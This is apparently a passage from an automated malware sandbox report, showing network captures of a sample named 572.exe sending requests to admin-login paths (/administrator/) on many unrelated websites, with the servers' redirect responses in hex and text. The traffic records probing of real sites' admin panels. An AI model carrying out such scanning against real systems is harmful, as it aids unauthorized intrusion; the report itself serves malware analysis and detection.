                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                161192.168.2.655096172.67.170.14780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.649003029 CET185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.929996014 CET825INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0%2FLX3oAF9ShnpXItlQpJbhrd4pEUutsKrKuUQSVYqFjdw8tbeib38vcgdB0w%2BMZvIHFUkhiR7BFxi3aBuYbIJcCl2uhGVvQsrXCgQyrovHcSfC5g5pEWYohNIoiX6OVdqtDnaghLc3U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6aef156733-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.930012941 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.090667009 CET194OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.288050890 CET840INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UgW1zu35uFutzLXZX%2FJxCfE5AkabP6%2BrhC%2B%2BO0tUfBg1bRFdHI839xMGS9mlKbLu4SmkWS4SWMnkwujzJSNeLc%2BHzGxlXJ28Gkmd0HeiWIr9uYodPFWU74bX5HpiIAdhkYIhvUrynrY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abba5ea416733-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.288069010 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                162192.168.2.655174142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.674981117 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.798202038 CET488INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.798221111 CET185INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 b0 35 d6 82 22 48 0e ed 31 68 30 82 71 25 89 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 95 68 6a 96 d0 8a e7 45 18 e2 2e 6a ce 1a 78 a9 01 09 65 56 b0 d2 4e f3 9b 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EH5"H1h0q%}cc0hjE.jxeVN!]nn({Dh7tQ2}]:J{0DfZ&`fZYEIE,u
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.610881090 CET245OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.733201027 CET497INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 192
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.733212948 CET192INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 7b 2d 31 a0 35 d6 82 22 48 0e ed 31 c4 60 02 c6 48 8c a5 fd fb 6a da 63 e7 b2 ec ec 30 bc 25 15 6f 6a 9a 90 8a 65 c5 36 f8 8d d7 8c 36 ee a9 7a c0 95 9d 9d 17 de 8c 6f 82 bf
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHI{-15"H1`Hjc0%oje66zo_0on(8m=Fms\b6H)!c![aTH:EodEpW/4R"8h##qe


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                163192.168.2.654960177.74.1.15780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.759857893 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.012419939 CET119INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://sistemas.pa.gov.br/administrator/


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                164192.168.2.65524754.85.194.18380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.761626959 CET185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.878971100 CET404INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.574162006 CET249OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://pxndx-mcr.boletia.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.690851927 CET413INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                165192.168.2.65526120.231.114.2480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.763947964 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.mojang.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.882514000 CET351INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.minecraft.net/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                166192.168.2.65475813.248.169.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.770139933 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.096194029 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_eomyKyGJY1bSwWR6/A5M0ypjsPkiPZZRAX/uCHH6syP1nAU9/MYAHRN/MHO3HGdgrrStP7wxVEPhIdPpRPiSug
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.133436918 CET398OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://secure.vexcorp.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.300560951 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_eomyKyGJY1bSwWR6/A5M0ypjsPkiPZZRAX/uCHH6syP1nAU9/MYAHRN/MHO3HGdgrrStP7wxVEPhIdPpRPiSug
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
